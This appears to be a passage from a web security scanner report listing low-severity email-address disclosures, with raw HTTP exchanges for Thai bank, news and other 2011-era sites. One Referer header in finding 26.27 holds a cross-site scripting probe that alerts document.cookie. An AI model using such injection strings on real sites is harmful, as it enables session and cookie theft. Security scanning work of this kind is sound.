Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


   <script>
       if(location.href.indexOf("kgateway")>=0){
           window.location.href="https://online.kasikornbankgroup.com
...[SNIP]...
<td style="COLOR: #FF850D; FONT-SIZE: 11px;">
............... : ks.cs@kasikornsecurities.com
</td>
...[SNIP]...

26.10. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/BT-CO-20110428-705019.html/x22

Issue detail

The following email address was disclosed in the response:

Request

GET /article/BT-CO-20110428-705019.html/x22 HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=aa0f634f-2160-4807-9b6f-dd9894b18d38; domain=.wsj.com; path=/; Expires=Fri Apr 30 09:24:28 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Wed, 02-May-2012 13:24:28 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep07 - Mon 05/02/11 - 00:46:42 EDT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=36
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 82539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a href="mailto:onlinejournal@wsj.com" class="linkbtn">mailto:onlinejournal@wsj.com</a>
...[SNIP]...

26.11. http://register2.set.or.th/styles/calendar/popBirthdate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /styles/calendar/popBirthdate.js

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/calendar/popBirthdate.js HTTP/1.1
Host: register2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://register2.set.or.th/semreg/enroll.aspx?ow=FKH&cs=S0001&sn=0050
Cookie: ASP.NET_SessionId=2nr0a545weyfl4ivrwijkwi5; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 14:07:50 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 07 Sep 2005 11:46:41 GMT
ETag: "8a4c7dd0a1b3c51:dcc"
Content-Length: 20514

//    written    by Tan Ling    Wee    on 2 Dec 2001
//    last updated 20 Jun 2003
//    email :    fuushikaden@yahoo.com

   var    fixedX = -1 // x position (-1 if to appear below control)
   var    fixedY = -1 // y position (-1 if to appear below control)
   var startAt = 0 // 0 - sunday ; 1 - monday
   var showWeekNumber = 0    
...[SNIP]...

26.12. http://truehits.net/stat.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The following email address was disclosed in the response:

Request

GET /stat.php?id=q0027704 HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:48 GMT
Server: Apache
Content-Length: 50379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<a href="mailto:.@ktb.co.th?subject=..................">
...[SNIP]...
</strong>: .@ktb.co.th<br />
...[SNIP]...

26.13. http://twitter.com/KBank_Live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /KBank_Live

Issue detail

The following email address was disclosed in the response:

Request

GET /KBank_Live HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429270-36774-61300
ETag: "9236e9ba3a0e891747be7255c635d244"
Last-Modified: Tue, 03 May 2011 13:27:50 GMT
X-Runtime: 0.00769
Content-Type: text/html; charset=utf-8
Content-Length: 53135
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429270340580; path=/; expires=Tue, 10-May-11 13:27:50 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442927034781083; path=/; expires=Thu, 02 Jun 2011 13:27:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEwVC7YvAToHaWQiJTExMWU1MmMyYTgzNDNl%250AZjQyZmZhNGQxNDI3NjdjN2E0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--96123277011b42aa09089579184a6267a5490ead; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
..................................... ........................ ................................................ KCC .................................................................................... kbanklive@kasikornbank.com .....................</span>
...[SNIP]...
....................... ................................. ........................ .................................... .................................... ........................... ............... kbanklive@kasikornbank.com .............................................</span>
...[SNIP]...

26.14. http://validator.w3.org/check  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://validator.w3.org
Path:   /check

Issue detail

The following email address was disclosed in the response:

Request

GET /check?uri=referer HTTP/1.1
Host: validator.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 13:28:04 GMT
Server: Apache/2
Vary: Referer,Accept-Encoding
Content-Length: 2555
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta
...[SNIP]...
<link rev="made" href="mailto:www-validator@w3.org" />
...[SNIP]...

26.15. http://www.bangkokbank.com/_layouts/NR/JavaScript/CommonClient.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/CommonClient.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /_layouts/NR/JavaScript/CommonClient.js HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Jan 2010 09:29:02 GMT
Accept-Ranges: bytes
ETag: "03cd53fc9fca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:05 GMT
Content-Length: 8030
Age: 459
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cHs f ])

// ********************************************************************
// Copyright (C) 2001 Microsoft Corporation. All rights reserved.
//
//    IMPORTANT. Please read the legal.txt file, located i
...[SNIP]...
pVersion);
}


function WM_netscapeCssFix() {
/*
Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)

Author: Taylor
Author Email: taylor@wired.com
Author URL: http://www.taylor.org/
*/

// This part was inspired by Matthew_Baird@wayfarer.com
// It gets around another unfortunate bug whereby Netscape
// fires a resize event when the scrollbars pop up. This
// checks to make sure that the window's available size
// has actual
...[SNIP]...

26.16. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business/company-in-thailand/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZXIzOXNwNnYyMWNwZTN1a3FmOTBlcGVhaDciO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=m7p0jcnu52i8b59ffdpsdscrf7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

26.17. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business/company-in-thailand/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNDFlYTd0aDc4OTMwNzNxbHFoNzYwcXA5cDUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=sp10k0fkgufd7cerlthgse6p52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

26.18. http://www.bangkokpost.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forum/viewtopic.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=b7f53d5b40c5dd063ef80eb8ba78634c; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiajNtZGs0NXE4N2ZsZm4zcGM4dW9yYmRqOTUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

26.19. http://www.bot.or.th/english/Pages/BOTDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bot.or.th
Path:   /english/Pages/BOTDefault.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /english/Pages/BOTDefault.aspx HTTP/1.1
Host: www.bot.or.th
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 53144
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 11:44:01 GMT
Last-Modified: Tue, 03 May 2011 11:44:01 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 03 May 2011 11:44:02 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html __expr-val-dir="ltr" dir="ltr">
<head><link href="../../Style%20Library/en-us/zz1_BOTMa
...[SNIP]...
<a id="ctl00_PlaceHolderMain_lnkServiceManager" class="servicemanager" href="mailto:PraneeR@bot.or.th">
...[SNIP]...
<a id="ctl00_PlaceHolderMain_lnkServiceManager" class="servicemanager" href="mailto:AreeP@bot.or.th">
...[SNIP]...

26.20. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:TmWaTfgWKfL150HA_TIl_THIIojbAg:DlLS6wTurRAvdZuM;Path=/accounts;Expires=Thu, 02-May-2013 13:35:40 GMT;Secure;HttpOnly
Set-Cookie: GALX=DVEOfIYoscA;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Tue, 03 May 2011 13:35:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10951
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

26.21. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:3xRNw51itG1YLFtl57J79ZLZ2oGmkQ:CweGJnEhEGG2esDX;Path=/accounts;Expires=Thu, 02-May-2013 13:35:35 GMT;Secure;HttpOnly
Set-Cookie: GALX=tN93GGEDnMc;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Tue, 03 May 2011 13:35:35 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10953
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

26.22. http://www.independent.co.uk/news/world/asia/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /news/world/asia/x26amp

Issue detail

The following email address was disclosed in the response:

Request

GET /news/world/asia/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:30 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=9A22AF1D575693F0AECFB775E75FBEC7; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...
<a href="mailto:userhelp@independent.co.uk">userhelp@independent.co.uk</a>
...[SNIP]...

26.23. http://www.independent.co.uk/news/world/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /news/world/x26amp

Issue detail

The following email address was disclosed in the response:

Request

GET /news/world/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:33 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=870E3BEDB5E937E1D6E7BC0ED11869A0; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...
<a href="mailto:userhelp@independent.co.uk">userhelp@independent.co.uk</a>
...[SNIP]...

26.24. http://www.independent.co.uk/news/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.independent.co.uk
Path:   /news/x26amp

Issue detail

The following email address was disclosed in the response:

Request

GET /news/x26amp HTTP/1.1
Host: www.independent.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:33:33 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: JSESSIONID=0BE25EBF416370901D26EB60FF42CDDF; Path=/independentLondon
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 73917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.f
...[SNIP]...
<a href="mailto:userhelp@independent.co.uk">userhelp@independent.co.uk</a>
...[SNIP]...

26.25. http://www.ktam.co.th/en/alliance.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/alliance.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/alliance.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 24884


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>Krung Thai Asset Management Public Company Limited. :- Happy Life Happy Investment</title>
<link href="style
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.26. http://www.ktam.co.th/en/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:17 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=d1cdc7e3a8eb0c5a4b6b250bbd07f90f; path=/
Connection: close
Content-Type: text/html
Content-Length: 29475

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.27. http://www.ktam.co.th/en/index.php/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/a

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/a HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:39 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29467

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.28. http://www.ktam.co.th/en/index.php/declarationnav.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/declarationnav.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/declarationnav.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
